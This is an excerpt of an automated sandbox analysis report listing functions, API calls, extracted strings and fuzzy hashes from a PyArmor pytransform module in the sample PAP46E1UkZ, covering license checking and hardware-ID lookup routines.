                                                                                                                                                                                                                              • Serial number with disk name: , xrefs: 70A22C3E
                                                                                                                                                                                                                              • %02x:, xrefs: 70A22CBB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$fprintffwrite$fputc$Process$Free$AdaptersAddressesstrchr$AllocNetworkParamsinet_ntoastrlen
                                                                                                                                                                                                                              • String ID: "%s"$Change logsv6.2.0(r21): Remove trailing dot from harddisk serial numberv6.4.2(r34): Support binding multiple mac addressesv6.5.3(r37): Support binding named harddiskv6.7.5(r45): Support mmc/sd card in Linux$%02x$%02x:$>"$Default Mac address: "%s"$Domain name: "%s"$Failed to get domain name.$Failed to get harddisk information.$Failed to get ip address.$Failed to get mac address.$Hardware informations got by PyArmor:$Ip address: "%s"$Multiple Mac addresses: "<$Serial number of default harddisk: "%s"$Serial number with disk name:
                                                                                                                                                                                                                              • API String ID: 340787292-3771683696
                                                                                                                                                                                                                              • Opcode ID: e85e57c299eb01dcaf1ac78965a1ad2997b4f6840d1205bcbbf965af232f04b9
                                                                                                                                                                                                                              • Instruction ID: 5dc9fee2de559097aeca5987cf289b421e359de536c3c8c40b6e068dd5231206
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e85e57c299eb01dcaf1ac78965a1ad2997b4f6840d1205bcbbf965af232f04b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2181252071111099FB14A772FD253AE1696DBCA7D0F90433A9E0E4B7EEDE3DD64A9301
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A10ED0 Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 225stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$_errno$strerror$fputc$fclose$_time64atoffreestrlenstrstr
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$*TIME:$license.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 3204063161-4277730492
                                                                                                                                                                                                                              • Opcode ID: b926bb29b34d162d34febaebcfebc411e8c2edd5e2893ee848a65dc8f4a18aa4
                                                                                                                                                                                                                              • Instruction ID: 38ccc0433d83a39747b1be63a2e4d7ffbe3f7d937c41d032945be89b941d57b1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b926bb29b34d162d34febaebcfebc411e8c2edd5e2893ee848a65dc8f4a18aa4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F581D060B19712C9EB059B22ED5175D23A5BB89BC1F48832ADD0E573ACDF3CF5868306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0FD30 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 234COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errnomalloc
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$j > 0$protect.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 2517923351-3883256839
                                                                                                                                                                                                                              • Opcode ID: af4f3587a1689fa81c4d741586eda173a2c64c0b51eaf268e8326cb30f9890da
                                                                                                                                                                                                                              • Instruction ID: f53ac032f4b4cc46a8883deb32171a7ab3538b44a96a8ce45bd874762995b011
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af4f3587a1689fa81c4d741586eda173a2c64c0b51eaf268e8326cb30f9890da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A381F56071875689EA019B22FE5075D2362BF89BC4F98822ADD0E5776DEF3CF505C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0A1F0 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 209COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$freemalloc
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$key != NULL$protect.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 1860011666-3885171557
                                                                                                                                                                                                                              • Opcode ID: e3cc286709aa62f81ddc2ff1ea044338b2af482c0a810764243919c72c1b2fe3
                                                                                                                                                                                                                              • Instruction ID: c27d42c7b3ddec595d30354ccfe942e38a60cfce59c03e447d3e808c92c5c256
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3cc286709aa62f81ddc2ff1ea044338b2af482c0a810764243919c72c1b2fe3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D571BE60B1970699EA05AB22FE1076D2396BF89BC0F44823A9D0E07379EF3CF501C316
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A12B20 Relevance: 59.7, APIs: 5, Strings: 29, Instructions: 230stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$freemallocstrerror
                                                                                                                                                                                                                              • String ID: (OOO)$+F7unNMN$04U5w91r$3fvNMf9L$41qM08fu$4mLks8EO$Ew==$HERhc2hp$IFB5c2hp$IoHvpCe3$RbgIUXyw$S8tSMMR7$UeQH2iY/$Wrap result failed$Xa2Z/Fdw$ZWxkIFBy$aGQGvX/a$b2plY3Ql$bmdzb2Z0$cDxn1XUJ$ej7tPRL6$fSis3Gx0$k6W630PQ$nc/WZrlr$oFj2UIkE$oVCzhcbp$p5dyeOAr$qNGCrKem$thDV3x4e
                                                                                                                                                                                                                              • API String ID: 2349789213-1418605665
                                                                                                                                                                                                                              • Opcode ID: 7727423dd42eee40632e79fe0ca663957ed71eee7fbcf9550e006eef01bf7418
                                                                                                                                                                                                                              • Instruction ID: 62a1bf1e893a2ffcd27640811fd2edeeaab78b8804b68cd0219a31828d7054be
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7727423dd42eee40632e79fe0ca663957ed71eee7fbcf9550e006eef01bf7418
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7B15876605B8889DBA4CF26B84074E77A9F788BC4F54812ACF8D5BB18EF38D561C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A16980 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 235COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errnofprintf$fputc$fclose
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$_pytransform.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 1597153534-2792274189
                                                                                                                                                                                                                              • Opcode ID: c1a2ea78d7f79207c2412dfd1cb52b7c1f521465e0a89e6de23959abe5901486
                                                                                                                                                                                                                              • Instruction ID: 9dbc4250edd564707152fc774b32446aa116378e45dc8fb44daf97debd96d727
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1a2ea78d7f79207c2412dfd1cb52b7c1f521465e0a89e6de23959abe5901486
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77918AA0B19712D6EA019B22ED5075D2375BB88BC5F448226DD0EA776CDF3CF646C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A04560 Relevance: 57.9, APIs: 28, Strings: 5, Instructions: 194stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$_errno$fputc$fclose$strerror
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$(O)$pytransform.log$wrapper.c
                                                                                                                                                                                                                              • API String ID: 1803879104-71371975
                                                                                                                                                                                                                              • Opcode ID: c818cddf7a951d3c6b6a3d84b245423e7fbc3b00cd6bde2519265067400fe677
                                                                                                                                                                                                                              • Instruction ID: 30bae1a191dc522fb8de0217c3652d456314ef10200038d00f0abd20e2f40e45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c818cddf7a951d3c6b6a3d84b245423e7fbc3b00cd6bde2519265067400fe677
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70717FA0B1970AD6EA149B62FE1475D2362BF89BC1F44422A9D0E1736CEF6CF505C302
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A13B70 Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 188stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$free$mallocstrerrorstrlen$fclosefseek
                                                                                                                                                                                                                              • String ID: Decode trial license failed$Format trial license file '%s'$Get current time failed$Invalid trial license file, size is %d != 256$Read trial license file '%s'$license.lic
                                                                                                                                                                                                                              • API String ID: 1618752535-3017380149
                                                                                                                                                                                                                              • Opcode ID: 35cccaad1bfe8998a0050dac5229afe5c56db8eb54e8201156b7ecab81bd8874
                                                                                                                                                                                                                              • Instruction ID: 1ee7cbcdeaee9574ee676e22ade6c6bfb3c6d5ca60cb45fcd76bf84983822336
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35cccaad1bfe8998a0050dac5229afe5c56db8eb54e8201156b7ecab81bd8874
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31712232B0968685DB01CF21F9513AD6371BB98784F948216DA4F637ACEF3CE589C750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A042B0 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 155stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: fprintf$_errno$fputc$fclosestrerror
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$(O)$pytransform.log$wrapper.c
                                                                                                                                                                                                                              • API String ID: 775964473-71371975
                                                                                                                                                                                                                              • Opcode ID: 755bccf10ff50c4c7a6d3a214ec4eeb6ee09d17b800a06e6e7dffcc3f0e1c791
                                                                                                                                                                                                                              • Instruction ID: 594574799d59ed96812e1a5a42d6c256461be48b5ecf0bb026980002782b5507
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 755bccf10ff50c4c7a6d3a214ec4eeb6ee09d17b800a06e6e7dffcc3f0e1c791
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33515EA0719706D9EA049B62FE5476D63A6BB89BC1F44422ADD0E1B37CEF7CF5058302
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A13050 Relevance: 42.3, APIs: 14, Strings: 10, Instructions: 271stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$strerrorstrlen
                                                                                                                                                                                                                              • String ID: %c%c%c%s$%c%s$%s%s$Could not generate license in trial version$Dashingsoft Pyshield Project$Encode buffer failed$Import rsa key failed$Sign hash failed$The size of serial number %d > 2048$The total size of serial number %d > 2560
                                                                                                                                                                                                                              • API String ID: 427076510-1296519401
                                                                                                                                                                                                                              • Opcode ID: 9adcc4717ff646bdf4cc76636f7170cff6bbeb597e1bafc68154e7e95410dcf3
                                                                                                                                                                                                                              • Instruction ID: 18c2c3b7d1f126f21cda3d88f57a9322116243ba530c4b088d43e970c221cb67
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9adcc4717ff646bdf4cc76636f7170cff6bbeb597e1bafc68154e7e95410dcf3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6C13C72608B8596EB60DF55F94038EB3A5F788784F544126DA8E53B2CEF3CE545CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A13570 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 168stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
